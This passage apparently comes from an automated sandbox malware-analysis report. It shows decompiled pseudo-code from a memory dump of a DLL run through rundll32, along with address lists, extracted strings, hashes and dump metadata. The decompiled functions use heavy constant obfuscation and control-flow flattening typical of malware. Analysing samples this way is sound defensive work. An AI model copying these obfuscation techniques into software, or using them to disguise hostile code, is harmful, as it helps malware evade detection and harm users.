						if(_t437 == 0x272c22c8) {
							_push(_t404);
							E1000D7B0(_v136);
							_t437 = 0x306f06ef;
							goto L9;
						}
						if(_t437 != 0x306f06ef) {
							if(_t437 != 0x31bcf33d) {
								goto L30;
							} else {
								E1001413E(_v144, _v288, _v152, _v140, _v160,  &_v132, _t427,  *((intOrPtr*)( *0x100221b4)),  &_v132, _v260, _v136, _t365, _v236,  &_v132);
								_t442 =  &(_t442[0xc]);
								asm("sbb esi, esi");
								_t437 = (_t437 & 0xf1ed0a80) + 0x272c22c8;
								goto L9;
							}
						}
						_t372 = _v164;
						if(_t372 == 0) {
							E100091CD(_v232, _v240, _v248,  *_t399, _v256);
							goto L34;
						}
						return _t372;
						L23:
						if(_t437 == 0x1c0040cf) {
							E10009970(_v188,  *_t440, _v196, _t427, _a4, _v172);
							_t442 =  &(_t442[4]);
							_t437 = 0x31bcf33d;
							_t404 = 0x6c;
							goto L30;
						}
						goto L24;
					}
				}
			}

0x100106c9
0x100106d3
0x100106d4
0x100106db
0x100106dd
0x100106e4
0x100106e5
0x100106e6
0x100106eb
0x100106f8
0x100106ff
0x10010702
0x1001070f
0x1001071a
0x1001071f
0x1001072a
0x10010735
0x10010740
0x1001074b
0x10010756
0x1001075e
0x10010766
0x1001076e
0x10010776
0x1001077e
0x10010786
0x1001078e
0x10010796
0x1001079e
0x100107aa
0x100107ac
0x100107b6
0x100107b8
0x100107be
0x100107c3
0x100107cb
0x100107d9
0x100107dd
0x100107e8
0x100107ec
0x100107f4
0x10010801
0x10010805
0x10010812
0x10010816
0x1001081e
0x1001082b
0x1001082f
0x1001083c
0x10010840
0x10010848
0x10010850
0x10010855
0x1001085d
0x10010862
0x1001086a
0x10010872
0x1001087a
0x10010882
0x10010887
0x1001088f
0x1001089a
0x100108a2
0x100108ad
0x100108b7
0x100108c3
0x100108c7
0x100108cf
0x100108d7
0x100108e7
0x100108eb
0x100108f3
0x100108fb
0x10010903
0x1001090b
0x10010913
0x1001091e
0x10010926
0x10010931
0x1001093c
0x10010947
0x10010952
0x1001095a
0x1001095f
0x10010967
0x1001096c
0x10010974
0x1001097f
0x10010987
0x10010992
0x1001099d
0x100109a5
0x100109b0
0x100109bb
0x100109c6
0x100109d1
0x100109d9
0x100109e2
0x100109e5
0x100109e9
0x100109f1
0x100109f9
0x10010a01
0x10010a06
0x10010a0e
0x10010a16
0x10010a1e
0x10010a26
0x10010a33
0x10010a37
0x10010a3f
0x10010a47
0x10010a4f
0x10010a57
0x10010a5f
0x10010a67
0x10010a6f
0x10010a77
0x10010a7f
0x10010a83
0x10010a88
0x10010a90
0x10010a9d
0x10010aa1
0x10010aa6
0x10010aab
0x10010ab3
0x10010abe
0x10010ac9
0x10010ad4
0x10010adc
0x10010ae9
0x10010af1
0x10010af9
0x10010b01
0x10010b09
0x10010b11
0x10010b16
0x10010b1e
0x10010b26
0x10010b2b
0x10010b30
0x10010b38
0x10010b40
0x10010b45
0x10010b4d
0x10010b55
0x10010b62
0x10010b66
0x10010b6e
0x10010b76
0x10010b7e
0x10010b83
0x10010b8b
0x10010b93
0x10010b9b
0x10010ba0
0x10010ba8
0x10010bb0
0x10010bb7
0x10010bb7
0x10010bb7
0x10010bbb
0x10010bbf
0x10010bbf
0x10010bc5
0x00000000
0x00000000
0x10010bcb
0x10010bcb
0x10010d1a
0x10010d57
0x10010d5c
0x10010d61
0x10010d87
0x10010d63
0x10010d63
0x10010d6a
0x10010d6c
0x10010d6e
0x10010d70
0x10010d71
0x10010d79
0x10010d7d
0x10010d7d
0x00000000
0x10010bd1
0x10010bd7
0x10010cbf
0x10010cc2
0x10010cc7
0x10010cc7
0x10010ccd
0x10010cd8
0x10010ce1
0x10010ce3
0x10010ce8
0x00000000
0x00000000
0x10010cf1
0x10010cf1
0x10010cf7
0x10010cfa
0x10010cfe
0x10010d03
0x10010d0a
0x00000000
0x10010bdd
0x10010be3
0x10010c5a
0x10010c8d
0x10010c92
0x10010c96
0x10010c9b
0x10010ca1
0x10010ca2
0x00000000
0x10010ca8
0x10010caa
0x10010cb0
0x00000000
0x10010cb0
0x10010be5
0x10010beb
0x10010c46
0x00000000
0x10010bed
0x10010bf3
0x10010e6a
0x10010e70
0x10010e9c
0x00000000
0x10010e9c
0x00000000
0x10010bf9
0x10010c16
0x10010c1e
0x10010c23
0x10010c28
0x10010c30
0x10010c36
0x10010c36
0x10010c3a
0x10010c3e
0x10010c40
0x10010bbf
0x10010bbf
0x10010bc5
0x00000000
0x00000000
0x00000000
0x10010bc5
0x00000000
0x10010bbf
0x10010bf3
0x10010beb
0x10010be3
0x10010bd7
0x10010d9d
0x10010da3
0x10010e28
0x10010e30
0x10010e37
0x00000000
0x10010e37
0x10010dab
0x10010db7
0x00000000
0x10010dbd
0x10010dff
0x10010e04
0x10010e09
0x10010e11
0x00000000
0x10010e11
0x10010db7
0x10010e77
0x10010e80
0x10010e94
0x00000000
0x10010e99
0x10010ead
0x10010d91
0x10010d97
0x10010e5a
0x10010e5f
0x10010e62
0x10010e69
0x00000000
0x10010e69
0x00000000
0x10010d97
0x10010bbf

Strings

}, xrefs: 10010756
H, xrefs: 100109B0
`(5p, xrefs: 10010A37
sQ, xrefs: 100107CB
NC, xrefs: 1001070F
g\, xrefs: 10010B1E
bS, xrefs: 100109D1
S~, xrefs: 100108AD
.U, xrefs: 100106EB
1:, xrefs: 10010C16
H, xrefs: 100108A2
~, xrefs: 10010B76

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: .U$1:$NC$S~$`(5p$bS$g\$sQ$}$~$H$H
API String ID: 0-2586239605
Opcode ID: a1961eb191cd199aeb8209c7e9ea1645c86b8df483a9194aca055b79612b1652
Instruction ID: dc36ea8a0aec24ac7b9885ce2b919ce4aba11c0453d1abd8bba0bdbca8633019
Opcode Fuzzy Hash: a1961eb191cd199aeb8209c7e9ea1645c86b8df483a9194aca055b79612b1652
Instruction Fuzzy Hash: 3A1222755083819FE364CF65C98AA4BBBF1FB84748F108A1CF6D98A260D7B59948CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1000A176, Relevance: 15.3, Strings: 12, Instructions: 324
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E1000A176() {
				char _v524;
				signed int _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _v704;
				signed int _v708;
				signed int _t350;
				intOrPtr _t357;
				void* _t360;
				void* _t361;
				void* _t366;
				void* _t367;
				char _t375;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				signed int _t409;
				signed int _t410;
				signed int _t411;
				signed int* _t414;

				_t414 =  &_v708;
				_v616 = 0x2445;
				_v616 = _v616 >> 0x10;
				_v616 = _v616 ^ 1;
				_v636 = 0xeea4;
				_t367 = 0x3f32878;
				_v636 = _v636 << 0xb;
				_v636 = _v636 << 1;
				_v636 = _v636 ^ 0x0eea4100;
				_v652 = 0xe797;
				_v652 = _v652 ^ 0x321c1edf;
				_v652 = _v652 ^ 0xd996a04c;
				_v652 = _v652 ^ 0xeb8a76ce;
				_v588 = 0xdcfc;
				_v588 = _v588 >> 7;
				_v588 = _v588 ^ 0x00000f60;
				_v612 = 0x8579;
				_v612 = _v612 + 0x6109;
				_v612 = _v612 ^ 0x0000e794;
				_v648 = 0x1b6b;
				_v648 = _v648 + 0xffff6a60;
				_v648 = _v648 << 0x10;
				_v648 = _v648 ^ 0x85cb09dc;
				_v584 = 0x1ff6;
				_v584 = _v584 << 0x10;
				_v584 = _v584 ^ 0x1ff65b4e;
				_v684 = 0xbc40;
				_v684 = _v684 >> 2;
				_v684 = _v684 + 0xffffd1fb;
				_v684 = _v684 | 0x2742d37c;
				_v684 = _v684 ^ 0x2742ef01;
				_v576 = 0x685a;
				_t404 = 0x6c;
				_v576 = _v576 / _t404;
				_v576 = _v576 ^ 0x00007f72;
				_t366 = 0;
				_v708 = 0x6bcc;
				_v708 = _v708 >> 8;
				_t405 = 0x3a;
				_v708 = _v708 * 0x2a;
				_v708 = _v708 >> 7;
				_v708 = _v708 ^ 0x0000462a;
				_v692 = 0xff9b;
				_v692 = _v692 | 0x74d94da3;
				_v692 = _v692 + 0xffffcc68;
				_v692 = _v692 | 0xbe89bc47;
				_v692 = _v692 ^ 0xfed98c58;
				_v632 = 0x3226;
				_v632 = _v632 | 0x070ffe2e;
				_v632 = _v632 / _t405;
				_v632 = _v632 ^ 0x001f3575;
				_v600 = 0xa48;
				_v600 = _v600 + 0xb52e;
				_v600 = _v600 ^ 0x0000cedf;
				_v580 = 0xa18a;
				_v580 = _v580 | 0x0c5a8a6e;
				_v580 = _v580 ^ 0x0c5abff1;
				_v664 = 0xe8f;
				_t406 = 0x37;
				_v664 = _v664 / _t406;
				_t407 = 0x46;
				_v664 = _v664 / _t407;
				_v664 = _v664 ^ 0x00006dce;
				_v640 = 0x71c;
				_v640 = _v640 << 0xe;
				_t408 = 0x49;
				_v640 = _v640 * 0x34;
				_v640 = _v640 ^ 0x5c6c577c;
				_v592 = 0x33b8;
				_v592 = _v592 | 0x07d87d51;
				_v592 = _v592 ^ 0x07d84187;
				_v696 = 0xa98f;
				_v696 = _v696 << 0xf;
				_v696 = _v696 + 0xffffe799;
				_v696 = _v696 + 0xffff3d0e;
				_v696 = _v696 ^ 0x54c69949;
				_v704 = 0x7465;
				_v704 = _v704 + 0xffffe849;
				_v704 = _v704 / _t408;
				_v704 = _v704 + 0xd0f1;
				_v704 = _v704 ^ 0x0000e434;
				_v596 = 0x236f;
				_v596 = _v596 | 0xc5dcb8d9;
				_v596 = _v596 ^ 0xc5dcb094;
				_v644 = 0x8021;
				_v644 = _v644 ^ 0xc828a343;
				_v644 = _v644 >> 3;
				_v644 = _v644 ^ 0x190550b3;
				_v604 = 0xfe6;
				_v604 = _v604 >> 0xb;
				_v604 = _v604 ^ 0x00002a8f;
				_v668 = 0x55eb;
				_v668 = _v668 | 0x71753889;
				_v668 = _v668 << 6;
				_v668 = _v668 ^ 0x5d5f3da4;
				_v608 = 0x70d4;
				_v608 = _v608 << 0xf;
				_v608 = _v608 ^ 0x386a033c;
				_v624 = 0xcf56;
				_t409 = 0x3d;
				_v624 = _v624 / _t409;
				_v624 = _v624 | 0x0bd4b4ae;
				_v624 = _v624 ^ 0x0bd4d1b6;
				_v660 = 0x16e5;
				_t410 = 0x36;
				_v660 = _v660 * 0x41;
				_v660 = _v660 / _t410;
				_v660 = _v660 ^ 0x0000307e;
				_v700 = 0xe2b6;
				_v700 = _v700 + 0x5bb5;
				_v700 = _v700 + 0xffff6142;
				_v700 = _v700 + 0x6e4e;
				_v700 = _v700 ^ 0x000141ab;
				_v656 = 0xb40;
				_v656 = _v656 + 0xffff4f1f;
				_v656 = _v656 ^ 0x21083a9e;
				_v656 = _v656 ^ 0xdef717ac;
				_v672 = 0x17c4;
				_v672 = _v672 | 0x21da6493;
				_t411 = 0x13;
				_v672 = _v672 / _t411;
				_v672 = _v672 * 0x3b;
				_v672 = _v672 ^ 0x691fea24;
				_v620 = 0x1ec3;
				_v620 = _v620 | 0x77b1d73c;
				_v620 = _v620 + 0xffffec92;
				_v620 = _v620 ^ 0x77b1dc68;
				_v628 = 0x112b;
				_t403 = _v616;
				_v628 = _v628 * 0x73;
				_v628 = _v628 << 0xd;
				_v628 = _v628 ^ 0xf6ca7d12;
				_v680 = 0x3092;
				_v680 = _v680 * 0x68;
				_v680 = _v680 << 1;
				_v680 = _v680 + 0xfffffa86;
				_v680 = _v680 ^ 0x00277106;
				_v676 = 0x2780;
				_v676 = _v676 ^ 0x4b6da339;
				_v676 = _v676 * 0x7a;
				_v676 = _v676 << 0xe;
				_v676 = _v676 ^ 0x500a8000;
				_v688 = 0x8ae7;
				_v688 = _v688 | 0x8dfab5cc;
				_v688 = _v688 * 0x18;
				_v688 = _v688 | 0x52f27c13;
				_v688 = _v688 ^ 0x5ff3fe78;
				do {
					while(_t367 != 0x3ba1fc4) {
						if(_t367 == 0x3f32878) {
							_t367 = 0x26bd27de;
							continue;
						} else {
							if(_t367 == 0x20bf73ca) {
								_push(0x10001000);
								_push(_v684);
								E100163BF(E1001BF25(_v648, _v584, __eflags), __eflags, _v708, _v692,  &_v524,  *0x100221b0, _v632,  *0x100221b0 + 0x234,  *0x100221b0 + 0x10, _v600);
								E1001C5F7(_v580, _v664, _v640, _v592, _t351);
								_t414 =  &(_t414[0xb]);
								_t367 = 0x3ba1fc4;
								continue;
							} else {
								if(_t367 == 0x24e637ac) {
									_t357 = _v568;
									_t375 = _v572;
									_v560 = _t357;
									_v552 = _t357;
									_v544 = _t357;
									_v536 = _t357;
									_v532 = _v676;
									_v564 = _t375;
									_v556 = _t375;
									_v548 = _t375;
									_v540 = _t375;
									_t360 = E1000BFA7(_v624, _t375, _v660, _v700,  &_v564, _t403, _v656);
									_t414 =  &(_t414[6]);
									_t367 = 0x2e72accb;
									__eflags = _t360;
									_t361 = 1;
									_t366 =  !=  ? _t361 : _t366;
									continue;
								} else {
									if(_t367 == 0x26bd27de) {
										E10012092(_v652,  &_v572, _v588, _v612);
										_t367 = 0x2c000c16;
										continue;
									} else {
										if(_t367 == 0x2c000c16) {
											_v572 = _v572 - E100023BC();
											_t367 = 0x20bf73ca;
											asm("sbb [esp+0x9c], edx");
											continue;
										} else {
											if(_t367 != 0x2e72accb) {
												goto L18;
											} else {
												E100078F0(_t403, _v672, _v620, _v628, _v680);
											}
										}
									}
								}
							}
						}
						L9:
						return _t366;
					}
					_t350 = E1000492A(_v688, _v616, _v696, _v704, _v596, _t367, _v636, _v644, _t367,  &_v524, 0, _v604, _v668, _v608);
					_t403 = _t350;
					_t414 =  &(_t414[0xc]);
					__eflags = _t350 - 0xffffffff;
					if(__eflags == 0) {
						_t367 = 0x1fc7849e;
						goto L18;
					} else {
						_t367 = 0x24e637ac;
						continue;
					}
					goto L9;
					L18:
					__eflags = _t367 - 0x1fc7849e;
				} while (__eflags != 0);
				goto L9;
			}

0x1000a176
0x1000a180
0x1000a18a
0x1000a190
0x1000a196
0x1000a19e
0x1000a1a3
0x1000a1a8
0x1000a1ac
0x1000a1b4
0x1000a1bc
0x1000a1c4
0x1000a1cc
0x1000a1d4
0x1000a1df
0x1000a1e7
0x1000a1f2
0x1000a1fa
0x1000a202
0x1000a20a
0x1000a212
0x1000a21a
0x1000a21f
0x1000a227
0x1000a232
0x1000a23a
0x1000a245
0x1000a24d
0x1000a252
0x1000a25a
0x1000a262
0x1000a26a
0x1000a27e
0x1000a283
0x1000a28c
0x1000a297
0x1000a299
0x1000a2a1
0x1000a2ab
0x1000a2ae
0x1000a2b2
0x1000a2b7
0x1000a2bf
0x1000a2c7
0x1000a2cf
0x1000a2d7
0x1000a2df
0x1000a2e7
0x1000a2ef
0x1000a2ff
0x1000a303
0x1000a30b
0x1000a316
0x1000a321
0x1000a32c
0x1000a337
0x1000a342
0x1000a34d
0x1000a359
0x1000a35e
0x1000a368
0x1000a36d
0x1000a373
0x1000a37b
0x1000a383
0x1000a38d
0x1000a390
0x1000a394
0x1000a39c
0x1000a3a7
0x1000a3b2
0x1000a3bd
0x1000a3c5
0x1000a3ca
0x1000a3d2
0x1000a3da
0x1000a3e2
0x1000a3ea
0x1000a3fa
0x1000a3fe
0x1000a406
0x1000a40e
0x1000a419
0x1000a424
0x1000a42f
0x1000a437
0x1000a43f
0x1000a444
0x1000a44c
0x1000a454
0x1000a459
0x1000a461
0x1000a469
0x1000a471
0x1000a476
0x1000a47e
0x1000a486
0x1000a48b
0x1000a493
0x1000a49f
0x1000a4a4
0x1000a4aa
0x1000a4b2
0x1000a4ba
0x1000a4c7
0x1000a4ca
0x1000a4d6
0x1000a4da
0x1000a4e2
0x1000a4ea
0x1000a4f2
0x1000a4fa
0x1000a502
0x1000a50a
0x1000a512
0x1000a51a
0x1000a522
0x1000a52a
0x1000a532
0x1000a53e
0x1000a541
0x1000a54a
0x1000a553
0x1000a55b
0x1000a563
0x1000a56b
0x1000a573
0x1000a57b
0x1000a588
0x1000a58c
0x1000a590
0x1000a595
0x1000a59d
0x1000a5aa
0x1000a5ae
0x1000a5b2
0x1000a5ba
0x1000a5c2
0x1000a5ca
0x1000a5d7
0x1000a5db
0x1000a5e0
0x1000a5e8
0x1000a5f0
0x1000a5fd
0x1000a601
0x1000a609
0x1000a611
0x1000a611
0x1000a623
0x1000a7c7
0x00000000
0x1000a629
0x1000a62f
0x1000a749
0x1000a74e
0x1000a799
0x1000a7b5
0x1000a7ba
0x1000a7bd
0x00000000
0x1000a635
0x1000a637
0x1000a6c4
0x1000a6cb
0x1000a6d2
0x1000a6d9
0x1000a6e0
0x1000a6e7
0x1000a6f6
0x1000a70a
0x1000a715
0x1000a71c
0x1000a723
0x1000a72f
0x1000a734
0x1000a737
0x1000a73c
0x1000a740
0x1000a741
0x00000000
0x1000a63d
0x1000a643
0x1000a6b3
0x1000a6ba
0x00000000
0x1000a645
0x1000a64b
0x1000a685
0x1000a68c
0x1000a691
0x00000000
0x1000a64d
0x1000a653
0x00000000
0x1000a659
0x1000a66b
0x1000a670
0x1000a653
0x1000a64b
0x1000a643
0x1000a637
0x1000a62f
0x1000a676
0x1000a67f
0x1000a67f
0x1000a80e
0x1000a813
0x1000a815
0x1000a818
0x1000a81b
0x1000a824
0x00000000
0x1000a81d
0x1000a81d
0x00000000
0x1000a81d
0x00000000
0x1000a829
0x1000a829
0x1000a829
0x00000000

Strings

o#, xrefs: 1000A40E
4, xrefs: 1000A406
a, xrefs: 1000A1FA
~0, xrefs: 1000A4DA
*F, xrefs: 1000A2B7
Zh, xrefs: 1000A26A
Nn, xrefs: 1000A4FA
&2, xrefs: 1000A2E7
H, xrefs: 1000A30B
E$, xrefs: 1000A180
U, xrefs: 1000A461
|Wl\, xrefs: 1000A394

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: a$&2$*F$4$E$$H$Nn$Zh$o#$|Wl\$~0$U
API String ID: 0-3924455481
Opcode ID: 87d0bd04f5f1a77db645eaf91b6ba43e9ae2281ffe926097a05e1c334afec65f
Instruction ID: 30a98e3762f80b306428089b8d4b001a67ddc991bb08abca52d42ae898d556aa
Opcode Fuzzy Hash: 87d0bd04f5f1a77db645eaf91b6ba43e9ae2281ffe926097a05e1c334afec65f
Instruction Fuzzy Hash: 61F113715083819FE368CF25C989A4BBBF1FBC5758F108A1DF299862A0D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 100193C9, Relevance: 15.3, Strings: 12, Instructions: 259
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E100193C9() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				signed int _v1052;
				signed int _v1056;
				unsigned int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				unsigned int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				void* _t291;
				void* _t297;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				void* _t347;
				signed int* _t351;

				_t351 =  &_v1168;
				_v1044 = _v1044 & 0x00000000;
				_v1048 = 0x516598;
				_v1108 = 0x3b16;
				_v1108 = _v1108 * 0x74;
				_t347 = 0x311804be;
				_v1108 = _v1108 ^ 0xd50e416f;
				_v1108 = _v1108 ^ 0xd514c4cb;
				_v1084 = 0x7213;
				_v1084 = _v1084 + 0xffff1ce9;
				_v1084 = _v1084 ^ 0xffffb376;
				_v1076 = 0x942d;
				_v1076 = _v1076 + 0x8243;
				_v1076 = _v1076 ^ 0x00015e40;
				_v1160 = 0xefc2;
				_v1160 = _v1160 + 0xffff37ee;
				_v1160 = _v1160 ^ 0xc712f7cb;
				_t301 = 0x1e;
				_v1160 = _v1160 / _t301;
				_v1160 = _v1160 ^ 0x06a2c559;
				_v1168 = 0x8bc8;
				_v1168 = _v1168 >> 0xd;
				_v1168 = _v1168 << 0xd;
				_t302 = 0xb;
				_v1168 = _v1168 * 0x79;
				_v1168 = _v1168 ^ 0x003cfea4;
				_v1092 = 0xa545;
				_v1092 = _v1092 >> 9;
				_v1092 = _v1092 ^ 0x00005d7c;
				_v1140 = 0xa869;
				_v1140 = _v1140 + 0x7fc8;
				_v1140 = _v1140 / _t302;
				_v1140 = _v1140 ^ 0x00006e61;
				_v1116 = 0x2c70;
				_v1116 = _v1116 << 0xf;
				_v1116 = _v1116 << 6;
				_v1116 = _v1116 ^ 0x8e00790e;
				_v1068 = 0x820b;
				_v1068 = _v1068 << 2;
				_v1068 = _v1068 ^ 0x00020295;
				_v1052 = 0x1207;
				_t303 = 0x11;
				_v1052 = _v1052 * 0x74;
				_v1052 = _v1052 ^ 0x00087ea5;
				_v1072 = 0x355d;
				_v1072 = _v1072 << 8;
				_v1072 = _v1072 ^ 0x00352c0b;
				_v1080 = 0x10d0;
				_v1080 = _v1080 << 0xd;
				_v1080 = _v1080 ^ 0x021a6542;
				_v1088 = 0x6c30;
				_v1088 = _v1088 >> 8;
				_v1088 = _v1088 ^ 0x00000016;
				_v1152 = 0xa8ea;
				_v1152 = _v1152 >> 0xf;
				_v1152 = _v1152 + 0xb411;
				_v1152 = _v1152 + 0x3cf;
				_v1152 = _v1152 ^ 0x0000e46f;
				_v1096 = 0x75ec;
				_v1096 = _v1096 + 0xffff70cd;
				_v1096 = _v1096 ^ 0xfffffc52;
				_v1104 = 0x93ae;
				_v1104 = _v1104 / _t303;
				_v1104 = _v1104 + 0xffff015e;
				_v1104 = _v1104 ^ 0xffff7730;
				_v1056 = 0xbdf9;
				_v1056 = _v1056 ^ 0xd4f8d9ff;
				_v1056 = _v1056 ^ 0xd4f80819;
				_v1128 = 0xf240;
				_v1128 = _v1128 + 0xffffadf5;
				_t304 = 0x6e;
				_v1128 = _v1128 * 0x47;
				_v1128 = _v1128 ^ 0x002c66a2;
				_v1060 = 0xbfc0;
				_v1060 = _v1060 >> 3;
				_v1060 = _v1060 ^ 0x00003168;
				_v1164 = 0xfebb;
				_v1164 = _v1164 + 0xffff52f0;
				_v1164 = _v1164 / _t304;
				_t305 = 0x5a;
				_v1164 = _v1164 / _t305;
				_v1164 = _v1164 ^ 0x00003ceb;
				_v1136 = 0x6ebb;
				_v1136 = _v1136 >> 0xe;
				_v1136 = _v1136 << 0xe;
				_v1136 = _v1136 ^ 0x00005f7f;
				_v1120 = 0xe73f;
				_v1120 = _v1120 ^ 0x98e7fdaf;
				_v1120 = _v1120 << 3;
				_v1120 = _v1120 ^ 0xc7388f6f;
				_v1112 = 0x84f4;
				_v1112 = _v1112 | 0xf7194f1a;
				_v1112 = _v1112 + 0xffffc2ac;
				_v1112 = _v1112 ^ 0xf719aa5d;
				_v1156 = 0x76fc;
				_v1156 = _v1156 + 0xffff5f4d;
				_v1156 = _v1156 + 0xffffa6b8;
				_v1156 = _v1156 + 0xd873;
				_v1156 = _v1156 ^ 0x000078a0;
				_v1124 = 0x47e1;
				_t306 = 0x21;
				_v1124 = _v1124 / _t306;
				_v1124 = _v1124 >> 0xd;
				_v1124 = _v1124 ^ 0x000072fc;
				_v1148 = 0x5566;
				_v1148 = _v1148 + 0xffff28de;
				_t307 = 0x31;
				_v1148 = _v1148 * 0x4f;
				_v1148 = _v1148 << 8;
				_v1148 = _v1148 ^ 0xd7f6da53;
				_v1132 = 0xf4f2;
				_v1132 = _v1132 << 3;
				_v1132 = _v1132 + 0x5d4f;
				_v1132 = _v1132 ^ 0x00082308;
				_v1100 = 0x806a;
				_v1100 = _v1100 >> 9;
				_v1100 = _v1100 / _t307;
				_v1100 = _v1100 ^ 0x00006f90;
				_v1144 = 0x33d6;
				_v1144 = _v1144 >> 9;
				_v1144 = _v1144 >> 4;
				_v1144 = _v1144 | 0x773178e8;
				_v1144 = _v1144 ^ 0x7731353c;
				_v1064 = 0x1023;
				_v1064 = _v1064 + 0x46cd;
				_v1064 = _v1064 ^ 0x00001a8d;
				_t291 = E10014237();
				do {
					while(_t347 != 0x7d8ec07) {
						if(_t347 == 0x1eca11d1) {
							return E10013D7C( &_v520, __eflags, _v1144, _v1064,  &_v1040);
						}
						if(_t347 == 0x311804be) {
							_t347 = 0x7d8ec07;
							continue;
						}
						_t357 = _t347 - 0x3581d11e;
						if(_t347 != 0x3581d11e) {
							goto L8;
						}
						_push(0x10001050);
						_push(_v1056);
						_t297 = E1001BF25(_v1096, _v1104, _t357);
						E100164EC(E10017B6B(), _t357, _t297, _v1164, 0x104,  *0x100221b0 + 0x10,  *0x100221b0 + 0x234, _v1136, _v1120, _v1112);
						_t291 = E1001C5F7(_v1156, _v1124, _v1148, _v1132, _t297);
						_t351 =  &(_t351[0xd]);
						_t347 = 0x1eca11d1;
					}
					_push(0x10001000);
					_push(_v1168);
					E100163BF(E1001BF25(_v1076, _v1160, __eflags), __eflags, _v1140, _v1116,  &_v1040,  *0x100221b0 + 0x234, _v1068,  *0x100221b0 + 0x234,  *0x100221b0 + 0x10, _v1052);
					_t291 = E1001C5F7(_v1072, _v1080, _v1088, _v1152, _t292);
					_t351 =  &(_t351[0xb]);
					_t347 = 0x3581d11e;
					L8:
					__eflags = _t347 - 0x3fe593;
				} while (__eflags != 0);
				return _t291;
			}

0x100193c9
0x100193cf
0x100193d6
0x100193de
0x100193ef
0x100193f3
0x100193f8
0x10019400
0x10019408
0x10019410
0x10019418
0x10019420
0x10019428
0x10019430
0x10019438
0x10019440
0x10019448
0x10019456
0x1001945b
0x10019461
0x10019469
0x10019471
0x10019476
0x10019480
0x10019483
0x10019487
0x1001948f
0x10019497
0x1001949c
0x100194a4
0x100194ac
0x100194bc
0x100194c0
0x100194c8
0x100194d0
0x100194d5
0x100194da
0x100194e2
0x100194ea
0x100194ef
0x100194f7
0x1001950a
0x1001950b
0x10019512
0x1001951d
0x10019525
0x1001952a
0x10019532
0x1001953a
0x1001953f
0x10019547
0x1001954f
0x10019554
0x10019559
0x10019561
0x10019566
0x1001956e
0x10019576
0x1001957e
0x10019586
0x1001958e
0x10019596
0x100195a4
0x100195a8
0x100195b2
0x100195ba
0x100195c5
0x100195d0
0x100195db
0x100195e3
0x100195f2
0x100195f5
0x100195f9
0x10019601
0x1001960c
0x10019614
0x1001961f
0x10019627
0x10019637
0x1001963f
0x10019644
0x1001964a
0x10019652
0x1001965a
0x1001965f
0x10019664
0x1001966c
0x10019674
0x1001967c
0x10019681
0x10019689
0x10019691
0x10019699
0x100196a1
0x100196a9
0x100196b1
0x100196b9
0x100196c1
0x100196c9
0x100196d1
0x100196dd
0x100196e2
0x100196e8
0x100196ed
0x100196f5
0x100196fd
0x1001970a
0x1001970b
0x1001970f
0x10019714
0x1001971c
0x10019724
0x10019729
0x10019731
0x10019739
0x10019741
0x1001974c
0x10019750
0x10019758
0x10019760
0x10019765
0x1001976a
0x10019772
0x1001977a
0x10019782
0x1001978a
0x1001979a
0x100197ae
0x100197ae
0x100197b8
0x00000000
0x10019900
0x100197c4
0x10019852
0x00000000
0x10019852
0x100197ca
0x100197cc
0x00000000
0x00000000
0x100197d2
0x100197d7
0x100197e6
0x1001982d
0x10019843
0x10019848
0x1001984b
0x1001984b
0x10019859
0x1001985e
0x100198a9
0x100198c8
0x100198cd
0x100198d0
0x100198d2
0x100198d2
0x100198d2
0x00000000

Strings

<, xrefs: 1001964A
?, xrefs: 1001966C
o, xrefs: 10019576
an, xrefs: 100194C0
0l, xrefs: 10019547
O], xrefs: 10019729
p,, xrefs: 100194C8
<51w, xrefs: 10019772
h1, xrefs: 10019614
]5, xrefs: 1001951D
G, xrefs: 100196D1
u, xrefs: 1001957E

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

